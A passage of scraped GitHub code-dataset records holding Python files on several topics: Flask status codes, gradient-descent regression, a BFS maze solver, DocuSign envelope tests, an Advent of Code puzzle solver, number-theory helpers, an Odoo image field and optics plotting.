BasicStatusCode(object):\n SERVER_ERROR = {\n 'code': 1001,\n 'message': \"服务器发生了未知错误\"\n }\n DATABASE_ERROR = {\n 'code': 1002,\n 'message': '数据库发生了未知错误'\n }\n INVALID_ARGS = {\n 'code': 1003,\n 'message': '非法参数'\n }\n TIMEOUT_ERROR = {\n 'code': 1004,\n 'message': '超时错误'\n }\n\n\n# 用户模块返回状态码及信息\nclass UserStatusCode(BasicStatusCode):\n PASSWORD_ERROR = {\n 'code': 2001\n }\n EXISTED_ERROR = {\n 'code': 2002\n }\n NOT_EXIST_ERROR = {\n 'code': 2003\n }\n WRONG_PWD_OR_ACCOUNT = {\n 'code': 2004,\n 'message': '用户名或密码错误'\n }\n INVALID_USER_ID = {\n 'code': 2005,\n 'message': '非法的user_id'\n }\n PERMISSION_NOT_ALLOW = {\n 'code': 2006,\n 'message': '权限不允许'\n }","repo_name":"zzzzzzzzs/flask_web_application","sub_path":"utils/status_code.py","file_name":"status_code.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19640318094","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nLAMBDA = 0.001\r\n\r\n\r\n# ======================\r\n\r\ndef preprocess(data):\r\n x1 = data[:, [0]]\r\n x2 = data[:, [1]]\r\n y = data[:, [2]]\r\n\r\n x1_mean = np.mean(x1)\r\n x2_mean = np.mean(x2)\r\n y_mean = np.mean(y)\r\n x1_std = np.std(x1)\r\n x2_std = np.std(x2)\r\n y_std = np.std(y)\r\n\r\n x1 = (x1 - x1_mean) / x1_std\r\n x2 = (x2 - x2_mean) / x2_std\r\n y = (y - y_mean) / y_std\r\n\r\n bias = np.expand_dims(np.ones([len(x1)]), axis=1)\r\n X = np.append(bias, x1, axis=1)\r\n X = np.append(X, x2, axis=1)\r\n\r\n\r\n return X, y\r\n\r\n\r\ndef rsquare(h_x,y):\r\n SST=0\r\n SSR=0\r\n y_bar=np.mean(y,axis=0)\r\n for i in range(len(y)):\r\n SST=SST+ (y[i]-y_bar)**2\r\n SSR=SSR+ (h_x[i]-y_bar)**2\r\n rsquare= SSR/SST\r\n return rsquare\r\n\r\n\r\n\r\ndef del_j(h_x, X, y, idx):\r\n del_j = 0\r\n\r\n for i in range(len(y)):\r\n del_j += (h_x[i] - y[i]) * X[i, idx]\r\n\r\n return del_j\r\n\r\n\r\n\r\ndef compute_J(h_x, y):\r\n m = np.shape(h_x)[0]\r\n temp = h_x - y\r\n J = (1 / (2 * m)) * (np.sum(temp ** 2))\r\n\r\n\r\n return J\r\n\r\n\r\ndef batch_grad(data, alpha=2e-8, epsilon=2e-10):\r\n X, y = preprocess(data)\r\n cost_value = []\r\n W = np.zeros([3, 1])\r\n w1 = []\r\n w2 = []\r\n eps = np.Inf\r\n\r\n epochs = 1000\r\n ep = 0\r\n h_x = np.dot(X, W)\r\n\r\n\r\n while (eps > epsilon) and (ep < epochs):\r\n print(ep)\r\n\r\n for j in range(len(W)):\r\n W[j] = W[j] - alpha * (del_j(h_x, X, y, j))\r\n\r\n w1.append(W[1, 0])\r\n w2.append(W[2, 0])\r\n\r\n h_x = np.dot(X, W)\r\n cost_value.append(compute_J(h_x, y))\r\n ep += 1\r\n\r\n if (len(cost_value) > 1):\r\n eps = np.abs(cost_value[-1] - cost_value[-2])\r\n\r\n print(cost_value)\r\n\r\n return cost_value, W, w1, w2,h_x\r\n\r\n\r\ndata_ = pd.read_csv('data.txt', header=None)\r\ndata_ = np.array(data_)\r\ndata=data_[:,1:]\r\n# data=rand(data_)\r\ntarget=data[:,2]\r\ntarget=(target-np.mean(target))/np.std(target)\r\nprint(np.mean(target,axis=0))\r\nnp.random.shuffle(data)\r\nALPHA = 1e-7\r\nX,y=preprocess(data)\r\nvalues, w, w1, w2,h_x = batch_grad(data, alpha=ALPHA)\r\nSE=compute_J(h_x,y)\r\nRMSE=SE**0.5\r\nrsquared=rsquare(h_x,y)\r\nprint('W values ', w)\r\n# print(len(values))\r\nprint(\"rsquare:\",rsquared)\r\nprint(\"RMSE\",RMSE)\r\nplt.plot(values)\r\nplt.title('Cost vs Iteration')\r\nplt.xlabel('Iteration')\r\nplt.ylabel('Cost')\r\nplt.show()\r\n\r\n","repo_name":"PandaBoi/FODS_Assignment","sub_path":"Assignment 1-20191124T022613Z-001/Assignment 1/Batch.py","file_name":"Batch.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73030018409","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nn, m = map(int, input().split())\ndata = [list(map(int, input().rstrip())) for _ in range(n)]\nqueue = deque()\nqueue.append((0, 0))\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nwhile queue:\n x, y = queue.popleft()\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < m:\n if data[nx][ny] == 1:\n data[nx][ny] = data[x][y] + 1\n queue.append((nx, ny))\n\nprint(data[n-1][m-1])","repo_name":"CHOSIYEON/Algorithms","sub_path":"BAEKJOON/DFSㆍBFS/2178.미로 탐색.py","file_name":"2178.미로 탐색.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8825455544","text":"from api.funds.models import DocumentFilter\nfrom api.libs.docusign.services import DocumentSigningService\nfrom api.tax_records.tests.factories import TaxRecordFactory, TaxFormFactory\nfrom core.base_tests import BaseTestCase\nfrom slugify import slugify\n\nfrom api.admin_users.tests.factories import AdminUserFactory\nfrom api.documents.tests.factories import DocumentFactory\nfrom api.partners.tests.factories import WorkFlowFactory, UserFactory\nfrom api.kyc_records.tests.factories import KYCRecordFactory, CardWorkFlowFactory\nfrom api.kyc_records.models import KYCRecord\nfrom api.workflows.models import Task\nfrom api.cards.default.workflow_types import WorkflowTypes\nfrom api.workflows.models import WorkFlow\nfrom api.cards.models import Workflow as CardWorkFlow\nfrom api.documents.models import FundDocument\nfrom api.agreements.services.create_applicant_agreement_documents import CreateApplicantAgreementDocument\nfrom api.agreements.services.application_data.get_application_values import GetApplicationValuesService\nfrom api.workflows.services.user_on_boarding_workflow import UserOnBoardingWorkFlowService\nfrom api.funds.services.gp_signing_service import GPSigningService\n\n\nclass TestGpSigningTasks(BaseTestCase):\n def setUp(self) -> None:\n self.create_company()\n self.create_user()\n self.create_card_workflow(company=self.company)\n self.setup_fund(company=self.company)\n self.client.force_authenticate(self.user)\n self.create_currency()\n self.admin_user = AdminUserFactory(company=self.company, user=self.user)\n\n def setup_application(self, kyc_record, tax_record=None):\n application = self.create_application(\n fund=self.fund,\n company_user=self.company_user,\n kyc_record=kyc_record,\n tax_record=tax_record\n )\n return application\n\n def create_fund_document(self, require_signature=True, require_gp_sign=False, signer=None):\n document = DocumentFactory(\n document_path=self.create_document_path(),\n company=self.company\n )\n fund_document = FundDocument.objects.create(\n document=document,\n fund=self.fund,\n require_signature=require_signature,\n require_gp_signature=require_gp_sign,\n gp_signer=signer\n )\n return fund_document\n\n def setup_kyc_record(self, user):\n name = \"{} {}\".format(WorkflowTypes.TRUST.value, self.company.name)\n workflow = CardWorkFlow.objects.get(\n slug=slugify(name),\n company=self.company,\n )\n kyc_record = KYCRecordFactory(company=self.company, user=user, workflow=workflow, company_user=self.company_user)\n return kyc_record\n\n def setup_tax_record(self, user):\n tax_record = TaxRecordFactory.create(company=self.company, user=user, us_holder=True)\n return tax_record\n\n def get_field(self, fields, field_id):\n for field in fields:\n if field['id'] == field_id:\n return field\n\n return {}\n\n def test_docu_sign_envelop_without_gp_signer(self):\n kyc_record = self.setup_kyc_record(user=self.user)\n application = self.setup_application(kyc_record=kyc_record)\n fund_document = self.create_fund_document()\n\n subscription_document_service = CreateApplicantAgreementDocument(application=application)\n envelop = subscription_document_service.get_envelope_payload(fund_agreement_document=fund_document)\n tabs = envelop['signers'][0]['data_tabs'][\"text_tabs\"]\n\n # assert signer details\n self.assertEqual(len(envelop['signers']), 1)\n self.assertEqual(envelop['signers'][0]['role_name'], 'applicant')\n self.assertEqual(envelop['signers'][0]['signer_email'], application.user.email)\n # assert task details\n self.assertEqual(self.get_field(tabs, 'aml-kyc-first_name')['value'], kyc_record.first_name)\n self.assertEqual(self.get_field(tabs, 'aml-kyc-last_name')['value'], kyc_record.last_name)\n\n def test_docu_sign_envelop_with_gp_signer(self):\n kyc_record = self.setup_kyc_record(user=self.user)\n application = self.setup_application(kyc_record=kyc_record)\n fund_document = self.create_fund_document(require_gp_sign=True, signer=self.admin_user)\n\n subscription_document_service = CreateApplicantAgreementDocument(application=application)\n envelop = subscription_document_service.get_envelope_payload(fund_agreement_document=fund_document)\n tabs = envelop['signers'][0]['data_tabs'][\"text_tabs\"]\n\n # assert signer details\n self.assertEqual(len(envelop['signers']), 2)\n self.assertEqual(envelop['signers'][0]['role_name'], 'applicant')\n self.assertEqual(envelop['signers'][0]['signer_email'], application.user.email)\n self.assertEqual(envelop['signers'][1]['role_name'], 'gp_signer')\n self.assertEqual(envelop['signers'][1]['signer_email'], self.admin_user.user.email)\n # assert tab details\n self.assertEqual(self.get_field(tabs, 'aml-kyc-first_name')['value'], kyc_record.first_name)\n self.assertEqual(self.get_field(tabs, 'aml-kyc-last_name')['value'], kyc_record.last_name)\n self.assertEqual(self.get_field(tabs, 'fund-gp_signer_name')['value'],\n f'{self.admin_user.user.first_name} {self.admin_user.user.last_name}'.strip())\n self.assertEqual(self.get_field(tabs, 'fund-gp_signer_title')['value'], self.admin_user.title)\n\n def test_create_envelope_with_gp_signer(self):\n kyc_record = self.setup_kyc_record(user=self.user)\n tax_record = self.setup_tax_record(user=self.user)\n application = self.setup_application(kyc_record=kyc_record, tax_record=tax_record)\n fund_document = self.create_fund_document(require_gp_sign=True, signer=self.admin_user)\n\n code = \"\"\"\n set aml-kyc-citizenship_country = \"United Kingdom\"\n if aml-kyc-citizenship_country == \"United Kingdom\" {\n set uk-aml-kyc-full_name = fields[aml-kyc-full_name]\n set uk-application-share_class = fields[application-share_class]\n set uk-application-vehicle = fields[application-vehicle]\n set uk-applicant-investor_signing_date = fields[applicant-investor_signing_date]\n set uk-aml-kyc-us_person_sign = fields[aml-kyc-us_person_sign]\n set fund-gp_signer_date-uk = fields[fund-gp_signer_date]\n require fund-gp_signer_sign-uk\n require fund-gp_signer_date-uk\n }\n \"\"\"\n fund = application.fund\n fund.document_filter = DocumentFilter.objects.create(code=code, fund=fund)\n fund.save()\n\n subscription_document_service = CreateApplicantAgreementDocument(application=application)\n envelope_args = subscription_document_service.get_envelope_payload(fund_agreement_document=fund_document)\n recipients = DocumentSigningService.get_recipients(envelope_args=envelope_args)\n self.assertIsNotNone(recipients)\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/agreements/tests/test_subscription_documents_envelop_service.py","file_name":"test_subscription_documents_envelop_service.py","file_ext":"py","file_size_in_byte":7088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16689463408","text":"import sys\nimport networkx as nx\nfrom functools import lru_cache\nimport pprint\npprint = pprint.pprint\n\n\ndef read_input(f):\n board = f.read().split('\\n')\n board[3] += ' '\n board[4] += ' '\n board = tuple((tuple(row) for row in board))\n return board\n\n\ndef valid_moves(board):\n moves = []\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n point_dict = {'A': 1, 'B': 10, 'C': 100, 'D': 1000}\n for i, let in zip(columns.values(), columns.keys()):\n if board[3][i] not in [let, '.']:\n if board[2][i] == '.':\n cl = board[3][i]\n for j in range(i, 0, -1):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (2 + (i-j)) * point_dict[cl]\n moves.append(((3, i), (1, j)))\n else:\n break\n for j in range(i, 12):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (2 + (j-i)) * point_dict[cl]\n moves.append(((3, i), (1, j)))\n else:\n break\n obstructed = False\n if i > columns[cl]:\n for j in range(columns[cl], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[cl]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[cl]] == '.':\n if i > columns[cl]:\n points = (2 + (i-j) + 2) * point_dict[cl]\n else:\n points = (2 + (j-i) + 2) * point_dict[cl]\n moves.append(((3, i), (3, columns[cl])))\n elif board[3][columns[cl]] == cl and board[2][columns[cl]] == '.':\n if i > columns[cl]:\n points = (2 + (i-j) + 1) * point_dict[cl]\n else:\n points = (2 + (j-i) + 1) * point_dict[cl]\n moves.append(((3, i), (2, columns[cl])))\n elif board[2][i] != '.':\n cl = board[2][i]\n for j in range(i, 0, -1):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (i-j)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n for j in range(i, 12):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (j - i)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n obstructed = False\n if i > columns[cl]:\n for j in range(columns[cl], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[cl]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[cl]] == '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 2) * point_dict[cl]\n else:\n points = (1 + (j-i) + 2) * point_dict[cl]\n moves.append(((2, i), (3, columns[cl])))\n elif board[3][columns[cl]] == cl and board[2][columns[cl]] == '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 1) * point_dict[cl]\n else:\n points = (1 + (j-i) + 1) * point_dict[cl]\n moves.append(((2, i), (2, columns[cl])))\n else:\n if board[2][i] not in [let, '.']:\n cl = board[2][i]\n for j in range(i, 0, -1):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (i-j)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n for j in range(i, 12):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (j - i)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n obstructed = False\n if i > columns[cl]:\n for j in range(columns[cl], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[cl]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[cl]] == '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 2) * point_dict[cl]\n else:\n points = (1 + (j-i) + 2) * point_dict[cl]\n moves.append(((2, i), (3, columns[cl])))\n elif board[3][columns[cl]] == cl and board[2][columns[cl]] == '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 1) * point_dict[cl]\n else:\n points = (1 + (j-i) + 1) * point_dict[cl]\n moves.append(((2, i), (2, columns[cl])))\n for i in range(1, 12):\n if board[1][i] != '.':\n let = board[1][i]\n obstructed = False\n if i > columns[let]:\n for j in range(columns[let], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[let]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[let]] == '.':\n if i > columns[let]:\n points = ((i-columns[let]) + 2) * point_dict[let]\n else:\n points = ((columns[let]-i) + 2) * point_dict[let]\n moves.append(((1, i), (3, columns[let])))\n elif board[3][columns[let]] == let and board[2][columns[let]] == '.':\n if i > columns[let]:\n points = ((i-columns[let]) + 1) * point_dict[let]\n else:\n points = ((columns[let]-i) + 1) * point_dict[let]\n moves.append(((1, i), (2, columns[let])))\n return moves\n\n\ndef can_move(board, row, col):\n columns = {3: 'A', 5: 'B', 7: 'C', 9: 'D'}\n done = True\n for i in range(5, 1, -1):\n if board[i][col] not in [columns[col], '.']:\n done = False\n if not done:\n can = True\n for i in range(2, row):\n if board[i][col] != '.':\n can = False\n else:\n can = False\n return can\n\n\ndef row1_moves(board, row, col):\n illegal = [3, 5, 7, 9]\n possible = []\n for j in range(col-1, 0, -1):\n if j not in illegal:\n if board[1][j] == '.':\n possible.append(j)\n else:\n break\n for j in range(col+1, 12):\n if j not in illegal:\n if board[1][j] == '.':\n possible.append(j)\n else:\n break\n return possible\n\n\ndef homecol_possible(board, row, col, row1pos=[]):\n if not row1pos:\n row1pos = row1_moves(board, row, col)\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n let = board[row][col]\n hc = columns[let]\n allowed = True\n for i in range(5, 1, -1):\n if board[i][hc] not in [let, '.']:\n allowed = False\n break\n if allowed:\n if hc > col:\n if hc-1 not in row1pos and hc-1 != col:\n allowed = False\n elif hc < col:\n if hc+1 not in row1pos and hc+1 != col:\n allowed = False\n if allowed:\n hcrow = None\n for i in range(5, 1, -1):\n if board[i][hc] == '.':\n hcrow = i\n break\n else:\n hcrow = None\n return (hcrow, hc) if hcrow else None\n\n\ndef part2_moves(board):\n moves = []\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n for col in columns.values():\n for row in range(5, 1, -1):\n if board[row][col] != '.':\n if can_move(board, row, col):\n row1 = row1_moves(board, row, col)\n for c in row1:\n moves.append(((row, col), (1, c)))\n hc = homecol_possible(board, row, col, row1)\n if hc:\n moves.append(((row, col), hc))\n for col in range(1, 12):\n if board[1][col] != '.':\n hc = homecol_possible(board, 1, col)\n if hc:\n moves.append(((1, col), hc))\n return moves\n\n\ndef finished(board):\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n fin = True\n for k, v in columns.items():\n if not (board[2][v] == k and board[3][v] == k and board[4][v] == k and board[5][v] == k):\n fin = False\n return fin\n\n\ndef do_move(board, move):\n (i1, j1), (i2, j2) = move\n let = board[i1][j1]\n lboard = [list(row) for row in board]\n lboard[i1][j1] = '.'\n lboard[i2][j2] = let\n return tuple((tuple(row) for row in lboard)), let\n\n\ndef isstate(board, points):\n state = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', '.', 'A', '.', '.', '.', 'C', '.', 'D', '.', '.', '.', '#'),\n ('#', '#', '#', '.', '#', '.', '#', 'A', '#', 'C', '#', '#', '#'),\n (' ', ' ', '#', '.', '#', 'D', '#', 'B', '#', 'B', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\n if board == state:\n return True\n\n\n@lru_cache(maxsize=None)\ndef sim(board, depth=0):\n moves = part2_moves(board)\n if moves:\n for move in moves:\n p1, p2 = move\n new_board, let = do_move(board, (p1, p2))\n added_points = price(p1, p2, let)\n G.add_edge(board, new_board, weight=added_points)\n sim(new_board, depth+1)\n else:\n ended_states.append((depth, board))\n # pprint(board)\n # if finished(board):\n # print(board)\n\n\ndef price(p1, p2, let):\n point_dict = {'A': 1, 'B': 10, 'C': 100, 'D': 1000}\n points = p2[0] - (2 - p1[0]) + abs(p1[1]-p2[1])\n # if p1[0] == 1:\n # points = p2[0] - 1 + abs(p1[1]-p2[1])\n # elif p1[0] == 2:\n # points = p2[0] + abs(p1[1]-p2[1])\n # else:\n # points = p2[0] + 1 + abs(p1[1]-p2[1])\n return points * point_dict[let]\n\n\nended_states = []\n# board = read_input(sys.stdin)\n# pprint(board)\n# board = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n# ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n# ('#', '#', '#', 'A', '#', 'D', '#', 'A', '#', 'C', '#', '#', '#'),\n# (' ', ' ', '#', 'D', '#', 'C', '#', 'B', '#', 'A', '#', ' ', ' '),\n# (' ', ' ', '#', 'D', '#', 'B', '#', 'A', '#', 'C', '#', ' ', ' '),\n# (' ', ' ', '#', 'C', '#', 'D', '#', 'B', '#', 'B', '#', ' ', ' '),\n# (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\nboard = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n ('#', '#', '#', 'B', '#', 'C', '#', 'B', '#', 'D', '#', '#', '#'),\n (' ', ' ', '#', 'D', '#', 'C', '#', 'B', '#', 'A', '#', ' ', ' '),\n (' ', ' ', '#', 'D', '#', 'B', '#', 'A', '#', 'C', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', 'D', '#', 'C', '#', 'A', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\nstate = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', 'B', 'B', '.', 'D', '.', 'B', '.', 'C', '.', 'D', 'D', '#'),\n ('#', '#', '#', '.', '#', '.', '#', '.', '#', 'C', '#', '#', '#'),\n (' ', ' ', '#', 'A', '#', '.', '#', '.', '#', 'A', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', '.', '#', '.', '#', 'C', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', 'D', '#', 'C', '#', 'B', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\nG = nx.DiGraph()\nsim(board)\nfin = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n ('#', '#', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', '#', '#'),\n (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\n# fin = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n# ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n# ('#', '#', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', '#', '#'),\n# (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n# (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\n# pprint(list(G.nodes))\nlength, path = nx.single_source_dijkstra(G, board, target=fin, weight='weight')\nprint(length)\n# for i, state in enumerate(path):\n# print(i)\n# pprint(state)\n# print(eval('[' + str(sim(board)).replace('[','').replace(']','') + ']'))\n# pprint(ended_boards)\n# pprint(state)\n# pprint(part2_moves(state))\n# pprint(sorted(ended_states, key=lambda x: x[0]))\n","repo_name":"gustavkrist/aoc2021","sub_path":"day23/day23.py","file_name":"day23.py","file_ext":"py","file_size_in_byte":14387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35492208285","text":"from fractions import Fraction\nimport math\n\ndef gcd( x, *xs ):\n try:\n it = iter( x )\n g = next( it )\n for y in it:\n g = math.gcd( g, y )\n except TypeError:\n g = x\n\n for y in xs:\n g = math.gcd( g, y )\n\n return g\n\ndef lcm(a, b):\n return a * b // math.gcd(a, b)\n\ndef modinv(a, m):\n g, x, y = xgcd(a, m)\n if g != 1:\n return None # modular inverse does not exist\n else:\n return x % m\n\ndef xgcd(a, b):\n \"\"\" Returns triplet g, x, y such that ax + by = g = gcd(a, b)\n Taken from: http://en.wikibooks.org/wiki/Algorithm_Implementation/Mathematics/Extended_Euclidean_algorithm\n \"\"\"\n x,y, u,v = 0,1, 1,0\n while a != 0:\n q, r = b//a, b%a\n m, n = x-u*q, y-v*q\n b,a, x,y, u,v = a,r, u,v, m,n\n _gcd = b\n return _gcd, x, y\n\ndef crt2( n1, a1, n2, a2 ):\n \"\"\" Computes the solution to the 2 simultaneous congruence relations:\n\n x = a1 (mod n1)\n x = a2 (mod n2)\n \"\"\"\n g = math.gcd( n1, n2 )\n delta = a2 - a1\n if delta % g != 0:\n raise ArithmeticError(\"No solution\")\n\n delta = delta // g\n inv = mul_inv( n1 // g, n2 // g )\n modulus = (n1 // g) * n2\n return modulus, (a1 + n1 * inv * delta) % modulus\n\ndef chinese_remainder(n, a):\n \"\"\" Computes the solution of a system of congruence relations, given by n and a\n\n n: list of moduli\n a: list of remainders\n\n \"\"\"\n tups = iter(zip(n, a))\n n1, a1 = next(tups)\n for n2, a2 in tups:\n n1, a1 = crt2( n1, a1, n2, a2 )\n\n return n1, a1\n \ndef mul_inv(a, b):\n b0 = b\n x0, x1 = 0, 1\n if b == 1: return 1\n while a > 1:\n q = a // b\n a, b = b, a%b\n x0, x1 = x1 - q * x0, x0\n if x1 < 0: x1 += b0\n return x1\n\n\ndef max_mods(a1, b1, m1, a2, b2, m2):\n \"\"\" Computes the maximum of the sum of:\n \n (a1 + b1 * x) mod m1 + (a2 + b2 * x) mod m2,\n \n taken over all possible integer values of x\n \"\"\"\n values1 = m1 // gcd( b1, m1 )\n values2 = m2 // gcd( b2, m2 )\n count = lcm( values1, values2 )\n max_v = -1, 0, 0\n arg_max = None\n for i in range(2 * count):\n v1 = (a1 + b1 * i) % m1\n v2 = (a2 + b2 * i) % m2\n v = v1 + v2\n if v > max_v[0]:\n max_v = v, v1, v2\n arg_max = i\n \n print(\"Max value = {}, attained at x = {}\".format(max_v[0], arg_max))\n print(\"Value: {} + {}\".format( max_v[1], max_v[2] ))\n","repo_name":"robertdeg/sdfpy","sub_path":"sdfpy/integers.py","file_name":"integers.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"39398478383","text":"from odoo import fields, models\n\n\nclass Fields(models.Model):\n _inherit = '_tu_helper.field'\n\n field_image = fields.Image(string='Image',\n max_width=1920,\n max_height=720,\n verify_resolution=True,\n attachment=True,\n help='This is Image field')\n\n\n # max_width - the maximum width of the image (default: 0, no limit)\n # (максимальная ширина картинки)\n\n # max_heidht - the maximun height of the image (default: 0, no limit)\n # (максимальная высота картинки)\n\n # Якщо зображення має більші розміри воно буде автоматично стиснуте до вказаних\n # На формі має вигляд сабнейлу завантаженого зображення з кнопками редагування або видалення\n\n # verify_resolution - whether the image resolution should be verified to ensure it doesn’t go over the maximum image resolution (default: True)\n # (должно ли изображение проверяться на предмет того, не выходит ли оно на рамки уставленных размеров)\n\n # attachment - whether the field should be stored as ir_attachment or in a column of the model’s table (default: True).\n # (должно ли поле храниться как ir_attachment или в столбце таблицы модели (по умолчанию: True).)\n\n # help - подсказка при наведении пользователем на поле\n\n\n","repo_name":"ikuchmar/OdooDev","sub_path":"_tu_helper/_Wiki/_Odoo/Dev Docs/Fields/Fields_Advanced/field_image.py","file_name":"field_image.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35901908846","text":"from objects import Field,Field1D,Field2D,Geometry,Mode,modal_decomposition\nimport matplotlib.pyplot as plt\nimport numpy as np\nPI=np.pi\ndef plot_intensity(field:Field2D,**kwargs):\n \"\"\"\n Intensity plot of a 2D field profile\n \"\"\"\n plt.xlabel(r\"x [$\\mu m$]\");plt.ylabel(r\"y [$\\mu m$]\")\n plt.imshow(field.intensity,cmap='jet',origin='lower', \\\n extent=[-field.geometry.xmax,field.geometry.xmax,-field.geometry.xmax,field.geometry.xmax],**kwargs)\n plt.colorbar()\n\ndef plot_mirr(e_mirr:Field1D,e_0:Mode):\n\n geometry=e_mirr.geometry\n mask = abs(geometry.x)<=geometry.xmax\n phase_avg,phase_rms=e_mirr.phase_moments()\n e_phase_shifted = e_mirr.phase_shift()\n e_expected = e_0.field_profile(geometry.L)\n\n if e_0.paraxial:\n paraxial='paraxial'\n else:\n paraxial='non-paraxial'\n if e_0.l!=0:\n e_mirr.phase_rectified[0]==0\n\n fig,axs = plt.subplots(2,1,sharex=True)\n fig.subplots_adjust(wspace=0.3)\n plt.xlabel(r\"x [$\\mu m$]\")\n axs[0].set_title(f\"Phase shifted field on the mirror surface \\n ({paraxial} propagation of {e_0.l}{e_0.p} mode) \\n \\\n Average phase = {phase_avg:.4f}, RMS phase = {phase_rms:.4f}\\n \\\n Paraxial phase = {e_0.get_gouy(geometry.L):.4f}\\n \\\n 1/(8k(Rm-L))={1/(8*geometry.k*(geometry.Rm-geometry.L)):.5f}, L={geometry.L}, Rm={geometry.Rm}\",fontsize=10)\n axs[0].set_title(\"(a)\")\n axs[0].set_ylabel(r\"$\\psi [V \\mu m^{-1}]$\")\n axs[0].plot(abs(geometry.x[mask]),(e_phase_shifted.real[mask]),'.',label=r'Re[$\\psi$]')\n axs[0].plot(abs(geometry.x[mask]),(e_phase_shifted.imag[mask]),':',label=r'Im[$\\psi$]')\n axs[0].plot(abs(geometry.x[mask]),(10*e_phase_shifted.imag[mask]),color='orange',label=r'10*Im[$\\psi$]')\n axs[0].plot(abs(geometry.x[mask]),e_phase_shifted.abs[mask],'.',color='green',markersize=2,label=r'$|\\psi|$')\n axs[0].plot(abs(geometry.x[mask]),e_expected.cross_section().abs[mask],'k--',label='Exact paraxial result',alpha=0.75)\n axs[0].legend(fontsize=8)\n\n axs[1].set_title(fr\"Phase profile\",fontsize=10)\n axs[1].set_ylabel(r'Arg $\\psi$ [rad]')\n axs[1].plot(abs(geometry.x[mask]),e_phase_shifted.phase_rectified[mask],'r')\n\n plt.legend(loc=1)\n plt.show()\n\ndef plot_plane(psi_e:Field1D,e_0:Mode):\n \"\"\"\n Phase plot of the field propagation to z=L.\n 